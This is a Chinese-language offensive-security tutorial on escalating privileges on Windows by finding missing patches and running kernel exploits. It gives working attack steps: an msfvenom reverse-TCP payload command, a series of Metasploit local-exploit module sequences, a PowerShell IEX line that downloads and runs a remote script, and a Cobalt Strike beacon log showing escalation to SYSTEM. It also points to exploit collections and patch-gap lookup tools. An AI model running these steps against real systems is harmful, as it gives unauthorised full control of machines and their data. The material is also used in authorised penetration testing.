文章前言

在后滲透測試階段,權限提升是一個繞不開的話題,其中"系統內核溢出提權"因其利用便捷成為了最為常用的方法,在使用該方法提權時我們只需要去查看目標系統中打了那些系統補丁,之后去找補丁的"互補"補丁,并利用對應的提權類的漏洞實現權限提升,本篇文章主要圍繞"系統內核溢出提權"的一些方法、思路進行簡易介紹~

權限查看

在獲取到目標系統的shell后,我們需要先確認以下當前用戶以及用戶權限,這一點可以通過在shell中輸入"whoami"以及"whoami /groups"來確定:

whoamiwhoami /groups

從上面的顯示結果可以看到當前用戶為"?win-op8vb0nlureal1ex",權限為"Mandatory LabelMedium Mandatory Level",而這里的"Mandatory LabelMedium Mandatory Level"是一個標準的普通用戶權限,而我們再提權階段要做得就是將此處的"Medium Mandatory Level"提升為"High?Mandatory Level"。

補丁查詢

利用系統溢出漏洞進行提權的關鍵是通過查看系統的補丁信息來找尋缺失的、可以利用來提權的補丁進行提權,下面介紹幾種常見的補丁查詢思路與方法

系統命令查看

在Windows操作系統中我們可以通過執行systeminfo來查看目標機器上安裝的補丁信息:

systeminfo

從上圖可以看到這里安裝了三個補丁:

• [01]: KB2534111
• [02]: KB2999226
• [03]: KB976902

同時我們也可以通過WMIC來快速查看當前系統安裝的補丁信息:

wmic qfe get Caption,Description,HotFixID,InstalledOn

如果想要查詢系統是否安裝某一個特定的補丁,可以通過以下命令進行簡易查詢:

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /c:"KB2534111" /c:"KB976902"

既然已經確定了當前系統的補丁信息,那么后續如何利用呢?當然是去查找缺失的、可以利用的補丁了!但是怎么找呢?不可能在茫茫大海中找吧?當然不是,這里推薦一個輔助網站:https://bugs.hacking8.com/tiquan/

我們可以在"補丁號"選項框中輸入當前系統的補丁信息,之后進行查詢來獲取當前系統的缺失的、可以利用的補丁信息,這里以上面查詢的補丁信息為例:

之后可以根據補丁來推薦相關的漏洞利用EXP,不過在使用EXP時還需要主要影響的操作系統:

關于提權類的EXP,這里推薦一個項目:https://github.com/Al1ex/WindowsElevation

該項目源自SecWiki維護的Windows-kernel-exploit,但是由于原作者不再更新與維護所以后期由筆者重新進行構建維護,同時也涵蓋了Bypass UAC系列,目前還在不斷的更新與完善中,同時該項目也主要用于收集網絡上公開的各大有價值的漏洞EXP/POC~

MSF框架查看

MSF框架中自帶提權輔助功能模塊——post/windows/gather/enum_pathes,該模塊會根據漏洞編號快速查找目標系統中的補丁信息,下面以目標主機為例做一個簡單的演示:

首先,我們需要獲取目標主機的一個Shell,這里我們再測試環境中直接通過MSFvenom來生成Payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f exe > shell.exe

之后在MSF中設置監聽:

之后再目標主機中執行EXE

之后成功返回會話:

之后在Meterpreter中執行如下命令即可查看系統補丁信息(老版本的會給出可用的EXP,MSF5好像不提供了):

run post/windows/gather/enum_patches

于此同時,我們也可以通過執行以下命令來查看目標系統可用的漏洞,之后探尋提權EXP:

run post/multi/recon/local_exploit_suggester

其他一些常見的模塊例如:

Windows ClientCopyImage Win32k Exploit:

Windows內核模式驅動程序中的漏洞可能允許特權提升,此模塊利用win32k.sys內核模式驅動程序中不正確的對象處理,此模塊已在Windows 7 x64和x86、Windows 2008 r2 sp1 x64的易受攻擊版本上進行了測試

use exploit/windows/local/ms15_051_client_copy_imageset lhost 192.168.1.107set session 1exploit

Windows TrackPopupMenu Win32k NULL Pointer Dereference:

此模塊已在Windows xp sp3、Windows server 2003 sp2、Windows 7 sp1、Windows server 2008 r2位和Windows server 2008 r2 sp1 64位上進行了測試

use exploit/windows/local/ms14_058_track_popup_menuset lhost 192.168.1.107set session 1exploit

Windows SYSTEM Escalation via KiTrap0D:

use exploit/windows/local/ms10_015_kitrap0dset lhost 192.168.1.107set session 1exploit

Windows Escalate Task Scheduler XML Privilege Escalation:

use exploit/windows/local/ms10_092_schelevatorset lhost 192.168.1.107set session 1exploit

MS16-016 mrxdav.sys WebDav Local Privilege Escalation:

use exploit/windows/local/ms16_016_webdavset lhost 192.168.1.107set session 1exploit

EPATHOBJ::pprFlattenRec Local Privilege Escalation:

use exploit/windows/local/ppr_flatten_recset lhost 192.168.1.107set session 1exploit

MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow:

use exploit/windows/local/ms13_053_ schlampereiset lhost 192.168.1.107set session 1exploit

MS16-032 Secondary Logon Handle Privilege Escalation:

use exploit/windows/local/ms16_032_secondary_logon_handle_privescset session 1exploit

Empire內置模塊

Empire框架也提供了關于內核溢出漏洞提權的漏洞利用方法,下面進行簡單演示:

usemodule privesc/powerup/allchecksexecute

PS:總體來看效果不是很理想,不如MSF~

PowerShell腳本

Sherlock(https://github.com/rasta-mouse/Sherlock)是一個在Windows下用于本地提權的PowerShell腳本,目前包含了以下漏洞:

• MS10-015 : User Mode to Ring (KiTrap0D)
• MS10-092 : Task Scheduler
• MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
• MS13-081 : TrackPopupMenuEx Win32k NULL Page
• MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
• MS15-051 : ClientCopyImage Win32k
• MS15-078 : Font Driver Buffer Overflow
• MS16-016 : 'mrxdav.sys' WebDAV
• MS16-032 : Secondary Logon Handle
• MS16-034 : Windows Kernel-Mode Drivers EoP
• MS16-135 : Win32k Elevation of Privilege
• CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

該工具的利用也是較為簡單,首先下載項目到本地,之后再終端調用Sherlock(獲取webshell的主機中直接上傳即可):

Import-Module .Sherlock.ps1

當然也可以遠程加載:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

之后執行以下命令來列舉當前系統中所有可利用的漏洞:

Find-AllVulns

當然你也可以搜索某一個特定漏洞,例如:

Find-CVE20177199

根據Sherlock的說明目前CS已經可以實現" 導入模塊——>查詢單一漏洞——>直接提權 "的一套流程了,下面是Github中的實例:

beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 20 bytes[*] You are Win7-x64Rastabeacon> powershell-import C:UsersRastaDesktopSherlock.ps1[*] Tasked beacon to import: C:UsersRastaDesktopSherlock.ps1[+] host called home, sent: 2960 bytesbeacon> powershell Find-MS14058[*] Tasked beacon to run: Find-MS14058[+] host called home, sent: 20 bytes[+] received output:Title      : TrackPopupMenu Win32k Null Pointer DereferenceMSBulletin : MS14-058CVEID      : 2014-4113Link       : https://www.exploit-db.com/exploits/35101/VulnStatus : Appears Vulnerablebeacon> elevate ms14-058 smb[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)[+] host called home, sent: 105015 bytes[+] received output:[*] Getting Windows version...[*] Solving symbols...[*] Requesting Kernel loaded modules...[*] pZwQuerySystemInformation required length 51216[*] Parsing SYSTEM_INFO...[*] 173 Kernel modules found[*] Checking module SystemRootsystem32ntoskrnl.exe[*] Good! nt found as ntoskrnl.exe at 0x0264f000[*] ntoskrnl.exe loaded in userspace at: 40000000[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0[*] Registering class...[*] Creating window...[*] Allocating null page...[*] Getting PtiCurrent...[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0[*] Creating a fake structure at NULL...[*] Triggering vulnerability...[!] Executing payload...[+] host called home, sent: 204885 bytes[+] established link to child beacon: 192.168.56.105beacon> getuid[*] Tasked beacon to get userid[+] host called home, sent: 8 bytes[*] You are NT AUTHORITYSYSTEM (admin)

PS:關于該Powershell的利用還有很多單一漏洞的查詢,讀者可以根據源碼進行分析~

Windows Exploit Suggester

工具介紹

Windows-Exploit-Suggester(https://github.com/GDSSecurity/Windows-Exploit-Suggester )是受Linux_Exploit_Suggester的啟發而開發的一款提權輔助工具,,它是用python開發而成,運行環境是python3.3及以上版本,且必須安裝xlrd,其主要功能是通過比對systeminfo生成的文件,從而發現系統是否存在未修復漏洞。

工具原理

Windows-Exploit-Suggester通過下載微軟公開漏洞庫到本地“生成日期+mssb.xls”文件,然后根據操作系統版本,跟systeminfo生成的文件進行比對。微軟公開漏洞庫下載地址:http://www.microsoft.com/en-gb/download/confirmation.aspx?id=36982?。同時此工具還會告知用戶針對于此漏洞是否有公開的exp和可用的Metasploit模塊。

工具安裝

安裝依賴xlrd:

pip install xlrd

之后下載Windows-Exploit-Suggester項目到本地:

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester

更新漏洞庫

之后執行以下命令,自動從微軟官網下載安全公告數據庫,下載的文件會自動保存在當前目錄下:

./windows-exploit-suggester.py --update

獲取系統信息

之后在目標系統中獲取systeminfo信息并將其保存到一個txt文件夾中:

systeminfo > sysinfo.txt

系統漏洞檢索

之后將目標系統中的sysinfo.txt文件復制出來,到安裝有Windows-Exploit-Suggester的主機上去執行如下命令,查詢系統中存在的可用漏洞信息,這里的參數d為指定漏洞庫,也就是之前跟新漏洞庫后的xlsx文件:

./windows-exploit-suggester.py -d 2020-09-09-mssb.xls -i sysinfo.txt

總體上效果還不錯,挺讓人滿意的,不過該工具也有一個缺點——更新數據庫后下載的數據庫最新的2017年的,有點局限

補丁列表

最后給出一個常用的補丁列表信息,可能數據有點成舊哈~